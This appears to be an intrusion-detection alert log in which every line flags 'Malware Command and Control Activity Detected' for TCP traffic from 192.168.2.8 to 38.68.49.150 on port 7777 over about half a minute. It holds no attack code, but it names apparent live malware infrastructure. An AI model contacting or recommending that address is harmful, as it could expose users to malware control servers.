2025-03-16T01:40:17.922896+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.041189+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.154450+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.277537+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.486605+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.713563+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.822458+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:18.931704+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.040975+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.172001+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.307002+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.431846+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.541025+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.650312+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.759694+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.869357+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:19.978527+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.087713+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.197259+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.326486+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.415956+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.778281+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:20.895722+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.052790+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.248492+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.373981+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.479547+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.587813+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.697317+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.806528+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:21.915924+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.030093+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.134684+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.244798+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.353571+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.462834+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.572293+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.681616+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.790859+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:22.918538+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.009724+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.119067+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.228617+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.337842+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.469574+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.572243+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:23.743001+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.145794+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.259997+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.369126+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.478853+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.587798+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.697405+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.806668+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:24.915858+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.025376+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.134660+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.244011+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.390554+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.462856+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.572070+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.681566+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.806461+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:25.900324+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.009663+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.119148+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.228503+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.370607+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.448007+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.556618+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.665987+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.775521+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.886679+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:26.994035+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.103577+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.243267+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.353434+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.462806+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.572098+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.681578+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.791245+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:27.900392+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.009660+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.119586+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.229456+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.349979+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.462826+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.575181+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.681662+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.790865+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:28.900236+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.009649+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.118971+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.228759+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.397783+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.447567+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.556828+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.665938+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.780769+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.884759+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:29.994287+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.108683+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.212769+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.328599+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.467644+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.572417+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.704564+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:30.954507+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.056486+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.165869+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.275165+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.384678+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.493949+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.612951+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.712721+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.822224+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:31.931542+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.040909+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.155443+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.259807+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.373210+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.478398+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.588030+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.697402+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.806566+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:32.916251+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.025229+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.140365+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.291018+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.519976+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.786057+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:33.900290+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.009560+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.118952+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.228725+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.337786+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.447382+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.556802+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.665955+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.775243+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:34.888495+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.009828+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.119229+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.228506+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.338098+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.447917+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.556628+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.666138+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.775275+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.889641+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:35.995537+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.105247+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.213647+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.322237+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.472394+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.619938+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.728619+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.862502+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:36.947237+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.056767+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.166565+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.275337+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.386500+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.494112+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.603530+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.712802+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.825710+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:37.931535+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.041202+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.150555+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.259690+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.369154+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.506501+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.587842+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.728883+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.837889+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:38.947146+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.056462+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.166013+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.275600+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.384663+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.494057+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.618605+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.712884+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.822477+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:39.931621+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.041020+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.150465+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.260567+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.369093+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.478745+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.587759+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.699797+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.806515+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:40.918886+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.025411+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.134684+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.258508+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.353548+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.462803+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.572323+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.681562+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.791015+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:41.900384+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.009920+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.121887+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.228699+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.529165+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.696608+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.806685+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:42.916015+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.025319+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.134570+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.243948+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.353486+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.462737+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.572281+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.681541+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.791024+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:43.903417+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.009847+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.119350+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.228399+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.337843+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.449264+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.556571+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
2025-03-16T01:40:44.666203+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.8	49686	38.68.49.150	7777	TCP
